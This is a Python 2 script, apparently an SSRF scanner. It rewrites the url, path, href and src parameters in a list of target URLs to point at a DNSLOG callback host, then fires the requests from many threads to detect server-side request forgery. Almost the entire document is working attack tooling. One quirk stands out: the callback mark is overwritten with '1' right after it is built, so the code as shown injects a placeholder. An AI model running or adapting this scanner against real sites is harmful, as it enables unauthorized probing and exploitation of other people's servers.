SSRF for DNSLOG
#encoding=gbk
import urllib2
import threading
import Queue
import json
import sys
import os
import re
lock = threading.Lock()
header = {"Content-type": "application/x-www-form-urlencoded",
'Accept-Language': 'zh-CN,zh;q=0.8',
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Cookie": "None",
"Connection": "close",
"Cache-Control": "no-cache"}
list403 = list()
def scan_http_service(mqueue,n):
while True:
if not mqueue.empty():
target = mqueue.get()
url = str(target)
url.strip()
else:
break
try:
with lock:
print("thread {} request for : {}".format(n,url))
req = urllib2.Request(url,headers=header)
response = urllib2.urlopen(req)
except urllib2.HTTPError, e:
with lock:
print("{} Exception : {}".format(e.code,url))
if e.code == 403:
list403.append(url)
# print e.read()
except urllib2.URLError, e:
with lock:
print e.reason
else:
pass
def readFile(filePath):
if os.path.exists(filePath):
listUrl = list()
with open(filePath, 'r') as f:
for line in f:
listUrl.append(line.strip('\n'))
else:
print("{} does not exist!".format(filePath))
exit()
print("get {} url in : {}".format(len(listUrl),filePath))
return listUrl
def delUrlForDnslog(url):
url_arr = url.split('?')
url = url_arr[0]
url_arr = url.split('://')
url = url_arr[1]
url = url.replace('/','_')
url = url.replace('.','_')
url = url.replace('#','')
url = url.replace('!','')
url = url.replace('\\','_')
url = url.replace(',','')
url = url.replace('%','')
url = url.replace(':','')
url = url.replace('$','')
url = url.replace('@','')
url = url.replace('(','')
url = url.replace(')','')
url = url.replace('*', '')
return url
def getMarkFromUrl(url):
dnsLogUrl = delUrlForDnslog(url)
if len(dnsLogUrl) > 100:
dnsLogUrl = dnsLogUrl[0:100]
dnsLogUrlMark = 'http://174.SSRF_'+ dnsLogUrl + ".3306.7049.vpst.***.com"
# acture dnslog
dnsLogUrlMark = "1"
return dnsLogUrlMark
def findRegAndReplace(pattern, original_url,dnsLogUrl):
reg_pattern = re.compile(pattern)
reg_url = reg_pattern.findall(original_url)
reg_url = str(reg_url).strip()
reg_url = reg_url[2:-2]
if len(reg_url):
if not '&' in reg_url:
url = original_url.replace(reg_url,dnsLogUrl)
return url
else:
pass
return original_url
def replaceWithDnsLog(original_url,dnsLogUrl):
pattern_urlAnd = r'%s(.+?)%s' % ('url=', '&')
pattern_pathAnd = r'%s(.+?)%s' % ('path=', '&')
pattern_hrefAnd = r'%s(.+?)%s' % ('href=', '&')
pattern_srcAnd = r'%s(.+?)%s' % ('src=', '&')
pattern_url = r'url=(.+?)$'
pattern_path = r'path=(.+?)$'
pattern_href = r'href=(.+?)$'
pattern_src = r'src=(.+?)$'
try:
url = findRegAndReplace(pattern_urlAnd, original_url,dnsLogUrl)
url = findRegAndReplace(pattern_pathAnd, url,dnsLogUrl)
url = findRegAndReplace(pattern_url, url,dnsLogUrl)
url = findRegAndReplace(pattern_path, url, dnsLogUrl)
url = findRegAndReplace(pattern_hrefAnd, url, dnsLogUrl)
url = findRegAndReplace(pattern_href, url, dnsLogUrl)
url = findRegAndReplace(pattern_srcAnd, url, dnsLogUrl)
url = findRegAndReplace(pattern_src, url, dnsLogUrl)
except:
url = original_url
return url
def delUrl(urlList):
finalUrlList = list()
for url in urlList:
original_url = str(url)
# print("original url: {}".format(original_url))
dnsLogUrl = getMarkFromUrl(original_url)
# print("dnsLogMark : {}".format(dnsLogUrl))
final_url = replaceWithDnsLog(original_url,dnsLogUrl)
if not final_url == original_url:
# print("final Url : {}".format(final_url))
finalUrlList.append(final_url)
print("DnsLogMark for {} URl".format(len(finalUrlList)))
return finalUrlList
def save403Url():
filename = "403ExceptionUrl.txt"
filePath = sys.path[0] + "\\urlDir\\" + filename
i = 0
while os.path.exists(filePath):
filename = "403ExceptionUrl_" + str(i) + ".txt"
filePath = sys.path[0] + "\\urlDir\\" + filename
i = i + 1
with open(filePath,'w') as f:
for line in list403:
f.writelines(line)
print("403 Exception Url save at :{}".format(filePath))
def main():
print("start run!")
filePath = sys.path[0] + '\\urlDir\\url.txt'
urlList = readFile(filePath)
urlList = delUrl(urlList)
n = 0
threads = []
myQueue = Queue.Queue()
for url in urlList:
myQueue.put_nowait(url)
t = threading.Thread(target=scan_http_service,args=(myQueue,n))
t.start()
threads.append(t)
n = n + 1
for t in threads:
t.join()
# save403Url()
if __name__ == '__main__':
main()